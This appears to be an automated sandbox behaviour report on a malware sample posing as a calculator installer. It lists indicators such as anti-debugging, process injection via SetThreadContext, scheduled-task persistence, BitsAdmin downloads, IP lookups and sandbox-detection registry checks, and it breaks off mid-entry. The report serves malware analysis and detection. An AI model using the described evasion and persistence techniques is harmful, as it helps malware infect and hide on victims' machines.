File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: Calculator%20Installation.exe File opened (read-only) \??\K: Calculator%20Installation.exe File opened (read-only) \??\Z: Calculator%20Installation.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 163 ipinfo.io 168 ip-api.com 179 ipinfo.io 206 ipinfo.io 31 ip-api.com 31 ipinfo.io 45 ipinfo.io 153 ipinfo.io -
Drops file in System32 directory 7 IoCs
Processes:
powershell.exerundll32.exedescription ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 33 IoCs
Processes:
2303097.scrr0qEA6ZNISqo0Tq09aQk8H2C.exe8167987.scr1092981.scrDXiS7jLx9LBM1kEuISf6_JlF.exebWLj9lfauqRfDndQtgrXhtd9.exelbbD1Mb94469URLfxW1wrRWT.exesBagaJbRYGdhvlfxFPDGBfzx.exeRIp6KOn6bTquopPdWGDEO8OZ.exeWzMNlEBCfd7fUc9yVHJGL8mN.exeB3xGPO7uW7v2ADymt3FoIKP9.exeSGQDazRjK3dj9h5PYpsGlAad.exemsiexec.exehQVevJHT7ifZkZy5q0HwRySe.exe6482018.scr7235880.scr5108028.scrpid Process 4852 2303097.scr 5528 r0qEA6ZNISqo0Tq09aQk8H2C.exe 5920 8167987.scr 1512 1092981.scr 4244 DXiS7jLx9LBM1kEuISf6_JlF.exe 6116 bWLj9lfauqRfDndQtgrXhtd9.exe 6000 lbbD1Mb94469URLfxW1wrRWT.exe 956 sBagaJbRYGdhvlfxFPDGBfzx.exe 6024 RIp6KOn6bTquopPdWGDEO8OZ.exe 4960 WzMNlEBCfd7fUc9yVHJGL8mN.exe 5312 B3xGPO7uW7v2ADymt3FoIKP9.exe 6476 SGQDazRjK3dj9h5PYpsGlAad.exe 6500 msiexec.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 5844 6482018.scr 6168 7235880.scr 2036 5108028.scr -
Suspicious use of SetThreadContext 8 IoCs
Processes:
Mon209c830507d573.exemshta.exeYY4xjF_W3oy_kHfCFkzkO1C7.exeRRLzwWRhJ6iHLobR1jUETLpO.exebo5pmCap6uvDHfHJN3UgwaJy.exehQVevJHT7ifZkZy5q0HwRySe.exeservices64.exeQkepztzlpatffm.exedescription pid Process procid_target PID 920 set thread context of 2400 920 Mon209c830507d573.exe 114 PID 1668 set thread context of 2896 1668 mshta.exe 116 PID 5724 set thread context of 5144 5724 YY4xjF_W3oy_kHfCFkzkO1C7.exe 232 PID 6540 set thread context of 1904 6540 RRLzwWRhJ6iHLobR1jUETLpO.exe 245 PID 1464 set thread context of 1912 1464 bo5pmCap6uvDHfHJN3UgwaJy.exe 259 PID 6304 set thread context of 5432 6304 hQVevJHT7ifZkZy5q0HwRySe.exe 367 PID 6760 set thread context of 7368 6760 services64.exe 315 PID 5676 set thread context of 12612 5676 Qkepztzlpatffm.exe 440 -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exePm3g9ctfYddsVPVoDBAKdcm8.exeDYbALA.exedata_load.exesetup.tmpdescription ioc Process File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Pm3g9ctfYddsVPVoDBAKdcm8.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\ autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll autosubplayer.exe File created C:\Program Files\Windows Media Player\ZHARYTEFIG\foldershare.exe DYbALA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\AqDFSDlmWiui.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\FarLabUninstaller\is-GVTLO.tmp setup.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe -
Drops file in Windows directory 30 IoCs
Processes:
msiexec.exerundll32.exesvchost.exesvchost.exedescription ioc Process File opened for modification C:\Windows\Installer\MSIFC5F.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\f76e7cc.msi msiexec.exe File created C:\Windows\SystemTemp\~DF79BA5C60B43E66F6.TMP msiexec.exe File created C:\Windows\Tasks\AqDFSDlmWiui.job rundll32.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\Installer\f76e7cc.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIEDD7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI130C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF8B2F15989ED82072.TMP msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\SystemTemp\~DFC5AE2860FB1E3B1F.TMP msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Installer\MSI3A.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF0C4D67E07CF3C94C.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSICD64.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFDD7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3C5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7BE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI82C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8BA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB6A.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Installer\MSIFAC8.tmp msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 5308 2008 WerFault.exe 110 5396 2200 WerFault.exe 107 5356 2912 WerFault.exe 100 5840 5560 WerFault.exe 144 4756 1044 WerFault.exe 130 5568 3504 WerFault.exe 181 7100 1176 WerFault.exe 167 5316 5388 WerFault.exe 156 3984 5888 WerFault.exe 165 6976 5652 WerFault.exe 161 5424 5588 WerFault.exe 206 1964 5496 WerFault.exe 208 3348 6304 WerFault.exe 213 7532 6748 WerFault.exe 288 7404 6676 WerFault.exe 287 6308 4048 WerFault.exe 286 1496 7400 WerFault.exe 321 3220 17256 WerFault.exe 344 6736 2460 WerFault.exe 377 6260 5468 WerFault.exe 362 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
RRLzwWRhJ6iHLobR1jUETLpO.exedescription ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RRLzwWRhJ6iHLobR1jUETLpO.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RRLzwWRhJ6iHLobR1jUETLpO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RRLzwWRhJ6iHLobR1jUETLpO.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeJzyjfnl.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.execYUc7wuTDsuE7h7XbhShNkR8.exeWerFault.exeWerFault.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Jzyjfnl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cYUc7wuTDsuE7h7XbhShNkR8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cYUc7wuTDsuE7h7XbhShNkR8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 5180 schtasks.exe 3992 schtasks.exe 6440 schtasks.exe 7396 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 6240 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 43 IoCs
Processes:
WerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execYUc7wuTDsuE7h7XbhShNkR8.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cYUc7wuTDsuE7h7XbhShNkR8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cYUc7wuTDsuE7h7XbhShNkR8.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 908 taskkill.exe 6044 taskkill.exe 7696 taskkill.exe 8924 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exesvchost.exesihclient.exepowershell.exeWaaSMedicAgent.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created 